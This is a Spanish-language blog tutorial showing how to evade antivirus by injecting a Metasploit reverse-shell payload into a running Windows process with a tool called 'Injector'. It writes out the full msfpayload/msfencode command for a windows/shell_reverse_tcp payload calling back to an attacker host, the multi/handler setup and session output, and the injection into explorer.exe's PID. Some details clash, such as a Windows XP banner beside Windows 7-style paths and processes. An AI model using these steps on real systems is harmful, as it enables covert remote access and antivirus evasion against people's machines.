Esta es una nueva herramienta para ‘bypassear’ antivirus que dejaría a un atacante inyectar código shell a través de una explotación de un proceso. Habilitando al atacante una shell a una locación remota, generalmente, se asume que podría ser un shell meterpreter por algunas obvias razones.

Acá dejaremos un pequeño tutorial de cómo obtener una shell remota mediante la inyección en un proceso con el Injector.

Lo primero que debemos hacer es usar Metasploit. Aqui estaremos usando el meterpreter ‘shell_reverse_tcp’. Ahi al final nos da la función ‘./msfencode’, el cual con el ‘alpha_upper’ tratará de codificar el shellcode y añadir una tarea de función de salida.

root@cholohack:/pentest/exploits/framework3# ./msfpayload windows/shell_reverse_tcp LHOST=192.168.1.5 LPORT=4444 EXITFUNC=thread R | ./msfencode -e x86/alpha_upper

A partir de ahora, iniciaremos un multi-handler:

msf > use multi/handler
msf exploit(handler) > set payload windows/shell_reverse_tcp
payload => windows/shell_reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.5
LHOST => 192.168.1.5
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.1.5:4444
[*] Starting the payload handler…
[*] Command shell session 1 opened (192.168.1.5:4444 -> 192.168.1.2:2438) at Tue Aug 17 20:30:20 -0400 2010
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Users\Administrator> LISTO PARA SHELLEAR (No chelear xD)

Con este payload todo está codificado y así eliminar cualquier caracter no válido y con el mult-handler puedes recibir la shell remota sin problemas.

C:\Users\Administrator\Documents\injector> tasklist

Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
System Idle Process              0 Services                   0         24 K
System                           4 Services                   0      2,532 K
smss.exe                       264 Services                   0      1,104 K
csrss.exe                      384 Services                   0      4,160 K
wininit.exe                    444 Services                   0      4,388 K
csrss.exe                      464 Console                    1     46,160 K
winlogon.exe                   512 Console                    1      6,984 K
services.exe                   552 Services                   0     10,444 K
lsass.exe                      560 Services                   0     12,304 K
dwm.exe                       1344 Console                    1     30,788 K
explorer.exe                  1988 Console                    1     72,408 K
taskhost.exe                  2016 Console                    1      9,348 K
OSPPSVC.EXE                   2360 Services                   0     10,004 K
GoogleDesktop.exe             3040 Console                    1      6,992 K
svchost.exe                   2076 Services                   0      5,488 K
AvastUI.exe                   2260 Console                    1      3,360 K
vmnat.exe                     2484 Services                   0      5,152 K
TeamViewer.exe                2288 Console                    1     19,680 K
svchost.exe                   1684 Services                   0      2,608 K
vmware-tray.exe               3092 Console                    1      4,496 K

Nuestro explorer tiene como PID el 1988.

Usamos ahora la herramienta ‘INJECTOR’ de esta manera:

C:\Users\Administrator\Documents\injector>injector.exe pgeneric.txt 1988

[*] Author: DouBle_Zer0
[*] HACKERS GARAGE Production
[*] Visit Us: http://www.garage4hackers.com

C:\Documents and Settings\Administrator\Desktop\injector> Your payload was just sent!! check your meterpreter

 

Acá está la herramienta y explicación original y el video original. Espero que les haya gustado esta explicación, cualquier duda no duden en preguntarmelo.

Por admin

Deja una respuesta

Ads Blocker Image Powered by Code Help Pro

Ads Blocker Detected!!!

We have detected that you are using extensions to block ads. Please support us by disabling these ads blocker.

Powered By
Best Wordpress Adblock Detecting Plugin | CHP Adblock